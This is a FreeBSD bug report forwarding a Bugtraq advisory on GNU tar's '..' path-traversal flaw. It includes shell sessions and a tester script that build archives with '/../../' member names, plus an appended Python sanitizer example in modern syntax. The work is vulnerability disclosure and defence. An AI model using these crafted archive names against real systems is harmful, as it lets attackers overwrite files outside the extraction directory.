Date:      Tue, 1 Oct 2002 22:19:56 -0700 (PDT)
From:      Brett Glass <brett@lariat.org>
To:        freebsd-gnats-submit@FreeBSD.org
Subject:   bin/43575: tar leaves system susceptible to maliciously crafted archives
Message-ID:  <200210020519.g925JuII015384@www.freebsd.org>


>Number:         43575
>Category:       bin
>Synopsis:       tar leaves system susceptible to maliciously crafted archives
>Confidential:   no
>Severity:       serious
>Priority:       high
>Responsible:    freebsd-bugs
>State:          open
>Quarter:        
>Keywords:       
>Date-Required:
>Class:          sw-bug
>Submitter-Id:   current-users
>Arrival-Date:   Tue Oct 01 22:20:02 PDT 2002
>Closed-Date:
>Last-Modified:
>Originator:     Brett Glass
>Release:        4.6.2
>Organization:
>Environment:
>Description:
FreeBSD's tar appears to be susceptible to the problem mentioned
in the attached message from Bugtraq:

Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 17532 invoked from network); 26 Sep 2002 23:50:32 -0000
X-Authentication-Warning: datacontact.hu: boldi owned process doing -bs
Date: Fri, 27 Sep 2002 02:11:07 +0200 (CEST)
From: Bencsath Boldizsar <bencsath.boldizsar@mail2002.ebizlab.hit.bme.hu>
X-X-Sender: boldi@datacontact.hu
To: bugtraq@securityfocus.com
Subject: Allot Netenforcer problems, GNU TAR flaw
Message-ID: <Pine.LNX.4.44.0209270208190.21585-100000@datacontact.hu>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=iso-8859-2
Content-Transfer-Encoding: 8BIT
X-Virus-Scanned: by amavis-dc
X-UIDL: 04e05b0b2a906d53883806bcadcee73b

Security Advisory, case study - Netenforcer

1. Multiple security flaws lead to Netenforcer privilege escalation
2. Vulnerable tar packages

[Netenforcer material snipped]

2. Description of the "tar" problem

Creating a tar file with the -P option, one can put any file names in the tar
file. While unpacking such tar files, tar is designed to remove the leading
slash. Another security feature of the tar package is to deny deployment of
any files whose name contains "dotdot" (".."). A bug in the tar package
leads to a security flaw:
"../something" is denied by tar
"/something" leading slash is removed
"/../something"  leading slash removed but ".." is NOT denied
"./../something" ".." is NOT denied.

Although we found this bug by studying tar, we found that it had already
been found by others, so we should give them credit:

check out:

From: Mark J Cox (mjc@redhat.com)
Subject: [SECURITY] bug in contains_dot_dot routine
Newsgroups: gnu.utils.bug
Date: 2002-05-27 03:45:07 PST
by
Mark J Cox / Red Hat / OpenSSL / Apache Software Foundation

and

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-1267

While this bug can affect systems with antivirus products (amavis is not
affected) or any systems like the aforementioned, we think that a "more
rapid" answer to such "small" security problems is needed.
As you have seen: small bugs can lead to a whole-system crack.

Tar - Affected software versions:
GNU tar is affected, but e.g. SunOS tar does not do any sanity check.

Debian:
tar 1.13.17-2  NOT vulnerable (-)
tar 1.13.25-3 (unstable) IS vulnerable (+)
tar 1.13.25-2 (unstable) IS vulnerable (+)
Suse 7.3
tar 1.13.18 NOT vulnerable
Suse 6.4
tar 1.13.17 NOT vulnerable
Netenforcer:
tar (in software 4.2) IS vulnerable

others: unknown

Sample session:

echo "foo bar" >/tmp/zz/b
echo "foo bar" >/tmp/zz/b2
echo "foo bar" >/tmp/zz/b3
echo "foo bar" >a

boldi@boldi:/tmp/b$ tar cfv b.tar a ../../../../../../../tmp/zz/b  -P
a
./../../../../../../tmp/zz/b
boldi@boldi:/tmp/b$ rm /tmp/zz/b
boldi@boldi:/tmp/b$ tar xfv b.tar
a
./../../../../../../tmp/zz/b
tar: ../../../../../../../tmp/zz/b: Member name contains `..'
tar: Error exit delayed from previous errors
boldi@boldi:/tmp/b$ ls -la /tmp/zz/b
ls: /tmp/zz/b: No such file or directory
#note - this is O.K. , if found ".." in the name

#session 2:
boldi@boldi:/tmp/b$ tar cfv b2.tar a /tmp/zz/b2 -P
a
/tmp/zz/b2
boldi@boldi:/tmp/b$ rm /tmp/zz/b2
boldi@boldi:/tmp/b$ tar xfv b2.tar
a
/tmp/zz/b2
tar: Removing leading `/' from member names
boldi@boldi:/tmp/b$ ls -la /tmp/zz/b2
ls: /tmp/zz/b2: No such file or directory
boldi@boldi:/tmp/b$ ls -la /tmp/b/tmp/zz/b2
-rw-rw-r--    1 boldi    boldi          10 sze  8 12:47 /tmp/b/tmp/zz/b2


boldi@boldi:/tmp/b$ tar cfv b3.tar a /////tmp/zz/b3 -P
a
/////tmp/zz/b3
boldi@boldi:/tmp/b$ rm /tmp/zz/b3
boldi@boldi:/tmp/b$ tar xfv b3.tar
a
/////tmp/zz/b3
tar: Removing leading `/////' from member names
boldi@boldi:/tmp/b$ ls -la /tmp/zz/b3
ls: /tmp/zz/b3: No such file or directory
#session 2 is o.k.


#session 3:
boldi@boldi:/tmp/b$ echo "try this one. boldi." >/tmp/zz/final
boldi@boldi:/tmp/b$ tar cfv bolditry.tar a /../../../../../../tmp/zz/final -P
a
/../../../../../../tmp/zz/final
boldi@boldi:/tmp/b$ rm /tmp/zz/final
boldi@boldi:/tmp/b$ ls -la /tmp/zz/final
ls: /tmp/zz/final: No such file or directory
boldi@boldi:/tmp/b$ tar xfv bolditry.tar
a
/../../../../../../tmp/zz/final
tar: Removing leading `/' from member names
boldi@boldi:/tmp/b$ ls -la /tmp/zz/final
-rw-rw-r--    1 boldi    boldi          21 sze  8 13:03 /tmp/zz/final
#session 3: vulnerable.

####Attachment: small script testing Your tar too#######
#!/bin/sh
# tar problem tester by boldi
# Creates $DIR/foo/bar, archives it under a "/../../..." member name (-P keeps
# the name verbatim), deletes the original, then extracts inside $DIR/tartest.
# If the file reappears at $DIR/foo/bar, extraction escaped the working directory.
TAR=/usr/bin/tar
DIR=/tmp

cd "$DIR" || exit 1
mkdir foo
cd foo || exit 1
echo "boldi" >bar
cd "$DIR" || exit 1
mkdir tartest
cd tartest || exit 1
"$TAR" cfv boldi.tar "/../../../../../../../$DIR/foo/bar" -P
rm "$DIR/foo/bar"
if [ -f "$DIR/foo/bar" ] ; then
        echo "something went wrong with the test"
else
        "$TAR" xfv boldi.tar 2>&1
        if [ -f "$DIR/foo/bar" ] ; then
                echo "Your tar is vulnerable"
        else
                echo "Your tar is NOT vulnerable or error occurred"
        fi
fi
# clean up the test files
cd "$DIR" || exit 1
rm -f foo/bar
rmdir foo
rm -f tartest/boldi.tar
rmdir tartest
##############end of attachment##########################


Boldizsar Bencsath
Dept. of Telecommunications
Budapest University of Technology and Economics
H-1111 Budapest, Magyar tudósok körútja 2. I ép. E.429.
email: bencsath.boldizsar@mail2002.ebizlab.hit.bme.hu
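The advisory above shows the flaw as four member-name cases: "../x" is refused, "/x" has its slash stripped, but "/../x" and "./../x" slip through because the ".." check does not look past the first component. The following Python is an added example written for this report; it is not part of the advisory and not GNU tar's source. `naive_check` is only a model of the observed symptom (a check that looks for a leading "../" in the raw name), assumed here to make the failure visible, and `safe_member_path` is the hardened form: strip leading slashes the way tar does, then refuse any ".." component wherever it appears. `would_escape` and `audit_member_list` are hypothetical helpers for checking a member list (such as `tar tf` output) before extracting; the constructed member names come from the sessions in the advisory.

```python
"""Member-name sanitization for archive extraction (added example)."""
import posixpath
from typing import List, Optional


def strip_leading_slashes(name: str) -> str:
    """Mimic tar's "Removing leading `/' from member names"."""
    return name.lstrip("/")


def naive_check(name: str) -> bool:
    """Model of the flawed check (an assumption, not tar's code):
    only a raw name that begins with '../' is refused.  This reproduces
    the advisory's observations: '../x' denied, '/../x' and './../x' accepted."""
    return not name.startswith("../")


def safe_member_path(name: str) -> Optional[str]:
    """Hardened check: return the relative path to write, or None to reject.

    Leading slashes are stripped first, then every path component is
    inspected, so '/../x', './../x' and 'a/../../x' are all refused while
    'a/..b/c' (a file name that merely contains dots) is kept.
    """
    stripped = strip_leading_slashes(name)
    if not stripped:
        return None
    if any(component == ".." for component in stripped.split("/")):
        return None
    # Collapse '.' components and duplicate slashes; normpath cannot
    # introduce '..' here because every '..' was already rejected.
    return posixpath.normpath(stripped)


def would_escape(name: str, dest: str = "/tmp/b") -> bool:
    """Resolve a member name the way the flawed extractor would (strip
    slashes, then join onto dest) and report whether it lands outside dest."""
    dest = posixpath.normpath(dest)
    target = posixpath.normpath(posixpath.join(dest, strip_leading_slashes(name)))
    return not (target == dest or target.startswith(dest + "/"))


def audit_member_list(names: List[str]) -> List[str]:
    """Return the member names an extractor must refuse.  Feed it the
    output of a listing pass before extracting into a real directory."""
    return [n for n in names if safe_member_path(n) is None]


# Constructed member names taken from the advisory's sessions 1 to 3.
SAMPLE_MEMBERS = [
    "a",
    "../../../../../../../tmp/zz/b",     # session 1: refused by tar
    "/tmp/zz/b2",                        # session 2: slash stripped, lands under cwd
    "/////tmp/zz/b3",                    # session 2: all leading slashes stripped
    "/../../../../../../tmp/zz/final",   # session 3: escapes the working directory
]

if __name__ == "__main__":
    for member in SAMPLE_MEMBERS:
        print(f"{member!r}: naive={naive_check(member)} "
              f"safe={safe_member_path(member)!r} escapes={would_escape(member)}")
```

Running the block prints one line per sample member; the session 3 name is accepted by `naive_check` yet flagged by `would_escape`, which is exactly the gap the advisory describes, while `safe_member_path` rejects every name that carries a ".." component.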

>How-To-Repeat:
      
>Fix:
      
>Release-Note:
>Audit-Trail:
>Unformatted:
